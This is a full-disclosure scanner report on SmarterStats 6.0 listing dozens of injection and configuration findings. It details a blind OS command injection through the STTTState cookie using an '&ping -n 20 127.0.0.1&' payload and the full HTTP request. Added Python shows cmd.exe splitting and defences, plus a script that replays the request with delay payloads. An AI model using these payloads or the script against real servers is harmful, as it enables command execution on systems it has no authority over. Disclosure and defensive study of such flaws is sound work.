Default Installation, SmarterStats 6.0, XML Injection, OS Command Execution, Smarter Stats Web Server, Report of October 2010


SmarterStats 6.2 Report updated on May 20, 2011 with Stored and Reflected XSS.
This Report was generated by XSS.CX Research Blog on Windows 2008 R2 Server, 64 Bit, at Tue Oct 12 15:20:59 CDT 2010, against SmarterStats 6.0 running on the SmarterTools Web Server (bundled in the download).


1. OS command injection

1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]

1.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtAdminNewPassword_SettingText parameter]

1.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]

1.5. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

1.6. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00_MPH_grdLogLocations_HiddenLSR parameter]

2. SQL injection

2.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24txtSmarterLogDirectory parameter]

2.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText parameter]

2.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText parameter]

2.4. http://vulnerable.smarterstats.6.0.host:9999/Default.aspx [ctl00%24PageTitle parameter]

2.5. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.6. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

2.8. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [Referer HTTP header]

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.10. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.11. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

2.12. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.13. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

2.21. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [Referer HTTP header]

2.22. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [STHashCookie cookie]

2.23. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [ReportType parameter]


SmarterStats 6.0, CWE-31, CWE-89, CAPEC-66, CAPEC-213, CAPEC-88

Hoyt LLC Research | Full Disclosure | As of March 14, 2011


3. XML injection

3.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STHashCookie cookie]

3.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STTTState cookie]

3.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [SelectedLanguage cookie]

3.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [loginsettings cookie]

3.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STHashCookie cookie]

3.6. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [STTTState cookie]

3.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [SelectedLanguage cookie]

3.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [loginsettings cookie]

3.9. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx [reportID parameter]

3.10. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STHashCookie cookie]

3.11. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STTTState cookie]

3.12. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [SelectedLanguage cookie]

3.13. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [loginsettings cookie]

3.14. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [subReportName parameter]

3.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

3.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

3.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

3.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

3.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

3.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

4. Cleartext submission of password

4.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

4.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

4.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

4.4. http://vulnerable.smarterstats.6.0.host:9999/Client/frmUser.aspx

4.5. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5. Cross-domain Referer leakage

5.1. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

5.2. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

5.3. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.4. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.5. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

5.6. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

6. Cookie without HttpOnly flag set

7. Password field with autocomplete enabled

7.1. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

7.2. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

8. Directory listing

8.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/

8.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/

8.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/GettingStarted/

8.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/Popups/

8.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/

8.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/

8.7. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/

8.8. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/BrowserOverrides/

8.9. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Error/

8.10. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/FileDownload/

8.11. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/GettingStarted/

8.12. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Internal/

8.13. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Login/

8.14. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Mail/

8.15. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Main/

8.16. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Popup/

8.17. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Portal/

8.18. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Print/

8.19. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Reporting/

8.20. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Stats/

8.21. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Track/

8.22. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/CSS/Wizard/

8.23. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/

8.24. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/

8.25. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Calendar/Img/

8.26. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Combobox/

8.27. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Common/

8.28. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/

8.29. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Editor/Img/

8.30. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Grid/

8.31. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Input/

8.32. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/

8.33. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Spell/Img/

8.34. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/

8.35. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/TabStrip/Img/

8.36. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/

8.37. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Toolbar/Img/

8.38. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/

8.39. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/CssImg/

8.40. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Controls/Window/Img/

8.41. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Flash/

8.42. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/

8.43. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/Pager/

8.44. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Javascript/

8.45. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Sounds/

8.46. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/

8.47. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/

8.48. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/Pager/

8.49. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/

8.50. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/Button/

8.51. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Plupload/

8.52. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/

8.53. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/DragDrop/

8.54. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuInternal/

8.55. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuTrack/

8.56. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/

8.57. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/rollover/

8.58. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenu/

8.59. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/iconmenustats/

8.60. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/

8.61. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/misc/tree/

8.62. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/skin/

8.63. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/social_icons/

8.64. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/stats/

8.65. http://vulnerable.smarterstats.6.0.host:9999/Client/

8.66. http://vulnerable.smarterstats.6.0.host:9999/Client/Popups/

8.67. http://vulnerable.smarterstats.6.0.host:9999/Services/

8.68. http://vulnerable.smarterstats.6.0.host:9999/Temp/

8.69. http://vulnerable.smarterstats.6.0.host:9999/UserControls/

8.70. http://vulnerable.smarterstats.6.0.host:9999/UserControls/PanelBarTemplates/

8.71. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/

8.72. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/

8.73. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/

9. Email addresses disclosed

9.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmEmailReportSettings.aspx

9.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmGeneralSettings.aspx

10. Content type incorrectly stated

10.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

10.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx

10.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmViewReports.aspx

10.4. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/AboutThisFolder.txt

10.5. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx

10.6. http://vulnerable.smarterstats.6.0.host:9999/Temp/0c2c2823b31f46149208732c08a4fee8.jpg

10.7. http://vulnerable.smarterstats.6.0.host:9999/Temp/1039b7037bea4372821b6b290d0745da.jpg

10.8. http://vulnerable.smarterstats.6.0.host:9999/Temp/1d4802d431604203a5254435a7181b01.jpg

10.9. http://vulnerable.smarterstats.6.0.host:9999/Temp/1f19d55ce9bf405b93deb28b84494a1f.jpg

10.10. http://vulnerable.smarterstats.6.0.host:9999/Temp/20226bc24c8e4c89926647164054826e.jpg

10.11. http://vulnerable.smarterstats.6.0.host:9999/Temp/26da1ed6256b4e7f89617f968309aea9.jpg

10.12. http://vulnerable.smarterstats.6.0.host:9999/Temp/272276131291426282a9ebb0efad2752.jpg

10.13. http://vulnerable.smarterstats.6.0.host:9999/Temp/29bf53d9459f4ad5897ed8fe1e6273c6.jpg

10.14. http://vulnerable.smarterstats.6.0.host:9999/Temp/3022c349e42e4a16915d331a96969eb5.jpg

10.15. http://vulnerable.smarterstats.6.0.host:9999/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

10.16. http://vulnerable.smarterstats.6.0.host:9999/Temp/356d07443f3445d88a06bf724a953c85.jpg

10.17. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a06471f3515434aa5438ccdb1d520e8.jpg

10.18. http://vulnerable.smarterstats.6.0.host:9999/Temp/3a8d8b9425a049fd9040fcd161eeba53.jpg

10.19. http://vulnerable.smarterstats.6.0.host:9999/Temp/47b58eea1f494809bf127e28495c2dd7.jpg

10.20. http://vulnerable.smarterstats.6.0.host:9999/Temp/48e37748c1fa4d0ca56699e5b80f0064.jpg

10.21. http://vulnerable.smarterstats.6.0.host:9999/Temp/53bea176ee1943dd981fd05e032eff33.jpg

10.22. http://vulnerable.smarterstats.6.0.host:9999/Temp/56dd80bb97d8414fbcfd594ed4282909.jpg

10.23. http://vulnerable.smarterstats.6.0.host:9999/Temp/590bf795fdaf4e02b7d0880f79b70e34.jpg

10.24. http://vulnerable.smarterstats.6.0.host:9999/Temp/5bf056fa42644067bd0099f9d59829e2.jpg

10.25. http://vulnerable.smarterstats.6.0.host:9999/Temp/60cde64eb7754b5d8ef26765f12a08ff.jpg

10.26. http://vulnerable.smarterstats.6.0.host:9999/Temp/610228c0ba7b4ab6803b2930991bc819.jpg

10.27. http://vulnerable.smarterstats.6.0.host:9999/Temp/67876ddccbec458db2d3c9fec41f1ab5.jpg

10.28. http://vulnerable.smarterstats.6.0.host:9999/Temp/788d1b2c29ad41fc956d04ff9b1e6a07.jpg

10.29. http://vulnerable.smarterstats.6.0.host:9999/Temp/78969dd70ff94762832f8dc8e7f76105.jpg

10.30. http://vulnerable.smarterstats.6.0.host:9999/Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg

10.31. http://vulnerable.smarterstats.6.0.host:9999/Temp/8494271a59234d898cdd787b473092ed.jpg

10.32. http://vulnerable.smarterstats.6.0.host:9999/Temp/869b700a3e8b4973a5fdd0981173fbce.jpg

10.33. http://vulnerable.smarterstats.6.0.host:9999/Temp/87c52fec79874f5a9f7278d96f4dc7f9.jpg

10.34. http://vulnerable.smarterstats.6.0.host:9999/Temp/91331a080c0148b0bddd5d75991acb5b.jpg

10.35. http://vulnerable.smarterstats.6.0.host:9999/Temp/9b829667b5214dbb92b4f41517bde32f.jpg

10.36. http://vulnerable.smarterstats.6.0.host:9999/Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

10.37. http://vulnerable.smarterstats.6.0.host:9999/Temp/AboutThisFolder.txt

10.38. http://vulnerable.smarterstats.6.0.host:9999/Temp/a1b92ef93b1b4be78245313c2d051569.jpg

10.39. http://vulnerable.smarterstats.6.0.host:9999/Temp/a61092b27bce47aa8accac88254b740c.jpg

10.40. http://vulnerable.smarterstats.6.0.host:9999/Temp/a796b3465add49de8e0c091a308040ff.jpg

10.41. http://vulnerable.smarterstats.6.0.host:9999/Temp/aa9f9504e4da409ebc871fa02f1cfc5d.jpg

10.42. http://vulnerable.smarterstats.6.0.host:9999/Temp/aae65ef47a3d4937bffc2e1dbe58c809.jpg

10.43. http://vulnerable.smarterstats.6.0.host:9999/Temp/ab51ac96f4bc4739bd3a746f1b589cd7.jpg

10.44. http://vulnerable.smarterstats.6.0.host:9999/Temp/afa9a3022c3e456690253161fd12125c.jpg

10.45. http://vulnerable.smarterstats.6.0.host:9999/Temp/b2972344c54b45e38070638051bc9478.jpg

10.46. http://vulnerable.smarterstats.6.0.host:9999/Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

10.47. http://vulnerable.smarterstats.6.0.host:9999/Temp/b970dd6404e94f54894db427147a64da.jpg

10.48. http://vulnerable.smarterstats.6.0.host:9999/Temp/b994a8c169af455497c7747bd9914800.jpg

10.49. http://vulnerable.smarterstats.6.0.host:9999/Temp/c77c8b574b60474b8ac78495f6f074dc.jpg

10.50. http://vulnerable.smarterstats.6.0.host:9999/Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

10.51. http://vulnerable.smarterstats.6.0.host:9999/Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

10.52. http://vulnerable.smarterstats.6.0.host:9999/Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

10.53. http://vulnerable.smarterstats.6.0.host:9999/Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

10.54. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

10.55. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7ea3804b059410d9c7faf6f178d6ae9.jpg

10.56. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0463b7c1a16472f90db2c0647d531bf.jpg

10.57. http://vulnerable.smarterstats.6.0.host:9999/Temp/f0b1d954de574491a98b97217656a58a.jpg

10.58. http://vulnerable.smarterstats.6.0.host:9999/Temp/f11eb6ccf75a496c84ce62908bd4560d.jpg

10.59. http://vulnerable.smarterstats.6.0.host:9999/Temp/f8ef6da096584c109a8620d83d0d2462.jpg

10.60. http://vulnerable.smarterstats.6.0.host:9999/default.aspx

10.61. http://vulnerable.smarterstats.6.0.host:9999/login.aspx

11. Content type is not specified

11.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmDefaultSiteSettings.aspx

11.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/Defaults/frmServerDefaults.aspx

11.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx

11.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

11.5. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/ButtonBarIcons.xml

11.6. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Skin.xml

11.7. http://vulnerable.smarterstats.6.0.host:9999/Client/frmImportSettings.aspx

11.8. http://vulnerable.smarterstats.6.0.host:9999/Client/frmSeoSettings.aspx

11.9. http://vulnerable.smarterstats.6.0.host:9999/Services/Web.config

11.10. http://vulnerable.smarterstats.6.0.host:9999/aspnet_client/system_web/4_0_30319/

11.11. http://vulnerable.smarterstats.6.0.host:9999/clientaccesspolicy.xml

11.12. http://vulnerable.smarterstats.6.0.host:9999/cloudscan.exe

11.13. http://vulnerable.smarterstats.6.0.host:9999/crossdomain.xml

11.14. http://vulnerable.smarterstats.6.0.host:9999/sitemap.xml



1. OS command injection
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there is a safer alternative method of performing the server-level task, one that cannot be manipulated into running commands other than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:
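The example below is added for this edition; it is not SmarterStats code and not part of the original report. It shows, first, why the report's `&ping -n 20 127.0.0.1&` payload works against a command built by string concatenation (a simplified model of cmd.exe splitting turns the tainted line into two commands), and then the two defences the remediation text is pointing at: an allow-list for the value and doing the task through a file-system API instead of a command interpreter. The `dir` command line and the path regex are assumptions for illustration; the page does not show what command SmarterStats actually executed.

```python
"""Added example: the CWE-78 pattern behind the report's `&ping -n 20
127.0.0.1&` payload, and the two defences (allow-list validation; no command
interpreter). Not SmarterStats code; the `dir` command line is a guess used
for illustration."""
import os
import re

# Values taken from the report's request: the normal txtSmarterLogDirectory
# value and the time-delay payload Burp injected.
NORMAL_VALUE = r'C:\SmarterLogs'
PAYLOAD = '&ping -n 20 127.0.0.1&'


def build_vulnerable_cmdline(log_dir: str) -> str:
    """Unsafe: untrusted text pasted into a string that cmd.exe will parse."""
    return f'dir {log_dir}'


def commands_seen_by_cmd(cmdline: str) -> list[str]:
    """Simplified model of cmd.exe command-line splitting: unquoted & && | ||
    separate commands, double quotes suppress splitting, ^ escapes one char."""
    commands, current, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '^' and not quoted and i + 1 < len(cmdline):
            current.append(cmdline[i + 1])
            i += 2
            continue
        if ch == '"':
            quoted = not quoted
        elif ch in '&|' and not quoted:
            commands.append(''.join(current).strip())
            current = []
            if i + 1 < len(cmdline) and cmdline[i + 1] == ch:
                i += 1          # '&&' and '||' are a single separator
            i += 1
            continue
        current.append(ch)
        i += 1
    commands.append(''.join(current).strip())
    return [c for c in commands if c]


# Defence 1: strict allow-list. A plain drive-letter path with no shell
# metacharacters, quotes or '..' segments; everything else is rejected.
SAFE_WINDOWS_DIR = re.compile(r'^[A-Za-z]:\\(?:[A-Za-z0-9_.\- ]+\\?)*$')


def validate_log_dir(log_dir: str) -> str:
    if len(log_dir) > 248 or '..' in log_dir or not SAFE_WINDOWS_DIR.fullmatch(log_dir):
        raise ValueError(f'rejected log directory: {log_dir!r}')
    return log_dir


# Defence 2: do the work through an API instead of a shell. If a child process
# is unavoidable, pass an argv list to the program itself (never cmd.exe /c);
# in ASP.NET that means Process.Start with UseShellExecute = false and the
# value passed as an argument, not embedded in a command string.
def list_log_files(log_dir: str) -> list[str]:
    return sorted(os.listdir(validate_log_dir(log_dir)))


if __name__ == '__main__':
    tainted = build_vulnerable_cmdline(NORMAL_VALUE + PAYLOAD)
    print(tainted)
    print(commands_seen_by_cmd(tainted))   # dir ... and ping ... as two commands
    for value in (NORMAL_VALUE, NORMAL_VALUE + PAYLOAD):
        try:
            print('accepted', validate_log_dir(value))
        except ValueError as err:
            print(err)
```

The splitter is only a model of cmd.exe, good enough to show the mechanism; the real defence is the pair of functions below it, where the injected value never reaches an interpreter at all.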



1.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [STTTState cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The STTTState cookie appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time-delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the STTTState cookie. The application timed out when responding to the request, indicating that the injected command caused a time delay.
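The evidence the scanner records here is a single request that timed out, which a slow or hung server could also produce. The check below is added for this edition (not part of the original report, not SmarterStats code): it rebuilds the Cookie header from the request above with STTTState carrying a `ping -n N` payload, and only treats the finding as confirmed when the measured latency grows in step with the requested delay across several values. Host, port, path and the cookie layout are copied from the report; the session id, the form body and the fake senders used in the test are placeholders or constructed.

```python
"""Added example: differential timing check for the blind OS command
injection reported in the STTTState cookie. Not SmarterStats code and not
part of the original report."""
import http.client
import statistics
import time
from typing import Callable
from urllib.parse import quote

# Target details copied from the report's request; the host is the report's
# placeholder, not a real system.
HOST, PORT = 'vulnerable.smarterstats.6.0.host', 9999
PATH = '/Admin/frmSite.aspx?SiteId=1&popup=true'


def delay_payload(seconds: int) -> str:
    """The report's cmd.exe payload, parameterised: `ping -n N 127.0.0.1`
    sleeps roughly N-1 seconds on Windows, so N = seconds + 1."""
    return f'&ping -n {seconds + 1} 127.0.0.1&'


def cookie_header(payload: str, session_id: str) -> str:
    """Rebuild the Cookie header from the report with STTTState replaced by
    the URL-encoded payload (the report shows %26ping%20-n%2020%20127.0.0.1%26)."""
    return ('ASP.NET_SessionId=' + session_id +
            '; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}'
            '; SelectedLanguage=; STTTState=' + quote(payload, safe=''))


def send_with_cookie(payload: str, session_id: str, body: str,
                     timeout: float = 60.0) -> float:
    """Live sender: POST the captured form body with the modified cookie and
    return the round-trip time in seconds (the timeout value if the server
    never answers). `body` must be the full __VIEWSTATE/__ASYNCPOST form post
    captured from a real authenticated session."""
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With': 'XMLHttpRequest',
        'X-MicrosoftAjax': 'Delta=true',
        'Cookie': cookie_header(payload, session_id),
    }
    conn = http.client.HTTPConnection(HOST, PORT, timeout=timeout)
    start = time.monotonic()
    try:
        conn.request('POST', PATH, body=body, headers=headers)
        conn.getresponse().read()
    except OSError:          # socket.timeout is an OSError subclass
        return timeout
    finally:
        conn.close()
    return time.monotonic() - start


def confirm_time_based(send: Callable[[str], float], delays=(0, 5, 10),
                       repeats: int = 3, tolerance: float = 2.0) -> bool:
    """Accept the finding only if the added latency follows the requested
    delay. A server that is slow or hung for every request (which a single
    timeout cannot rule out) fails this check."""
    baseline = statistics.median(send('') for _ in range(repeats))
    for d in delays:
        observed = statistics.median(send(delay_payload(d)) for _ in range(repeats))
        if abs((observed - baseline) - d) > tolerance:
            return False
    return True


if __name__ == '__main__':
    # Live use (needs an authenticated session id and the captured form body):
    # confirm_time_based(lambda p: send_with_cookie(p, SESSION_ID, FORM_BODY))
    print(cookie_header(delay_payload(19), 'ijbzrxuei0fhzn5qh4jllhd4'))
```

With `delays=(0, 5, 10)` the 0-second control doubles as a check that the payload itself does not break the request; if the site is busy, raise `repeats` rather than `tolerance`.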

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=%26ping%20-n%2020%20127.0.0.1%26
Content-Length: 30100

